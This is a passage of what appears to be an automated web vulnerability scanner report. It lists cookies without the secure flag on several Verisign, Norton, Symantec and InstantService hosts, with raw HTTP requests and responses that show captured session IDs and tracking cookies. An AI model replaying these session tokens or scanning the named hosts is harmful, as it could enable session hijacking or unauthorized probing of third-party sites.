Set-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5905
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#85;
...[SNIP]...

6.3. https://admin.instantservice.com/links/5851/16144

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/16144

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16144 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5858
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#65;
...[SNIP]...

6.4. https://admin.instantservice.com/links/5851/16145

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/16145

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16145 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5853
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#65;
...[SNIP]...

6.5. https://admin.instantservice.com/links/5851/39897

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/39897

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/39897 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5946
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#85;
...[SNIP]...

6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://onlinefamily.norton.com
Path:   /familysafety/loginStart.fs

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:55 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/
Set-Cookie: formVersion=1315604755623; Path=/
Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 37906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <
...[SNIP]...

6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/outsideSearch

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/outsideSearch HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

6.8. https://securitycenter.verisign.com/celp/enroll/retail

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/retail

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:43:53 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

6.9. https://securitycenter.verisign.com/celp/enroll/upsell

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/upsell

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/upsell?application_locale=VRSN_US&originator=VeriSign:CELP&bundle_id=MSIECS002 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:18 GMT
Content-type: text/html;charset=UTF-8
Location: https://securitycenter.verisign.com/celp/enroll/retail
Set-Cookie: JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/
Content-Length: 303

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://securitycenter.verisign.co
...[SNIP]...

6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlinefamily.norton.com
Path:   /familysafety/basicpremium.fs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /familysafety/basicpremium.fs HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:30 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:30 GMT; Path=/
Set-Cookie: formVersion=1315604730862; Path=/
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 41316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Web Moni
...[SNIP]...

6.11. https://renewals.symantec.com/renewals/application

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/application

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
Content-Length: 21436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />


<!-- BEGIN
...[SNIP]...

6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trustseal_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.17. https://trust-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.18. https://trust-center.verisign.ch/process/retail/trust_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.19. https://trust-center.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Apache
Set-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4710
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/x-icon

...[SNIP]...

6.20. https://trust-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.21. https://trust-center.verisign.com/process/retail/help_and_support

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/help_and_support

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:53 GMT
Server: Apache
Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 138732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.22. https://trust-center.verisign.com/process/retail/redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/redirect

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:00 GMT
Server: Apache
Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.23. https://trust-center.verisign.com/process/retail/session_timeout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/session_timeout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/session_timeout HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
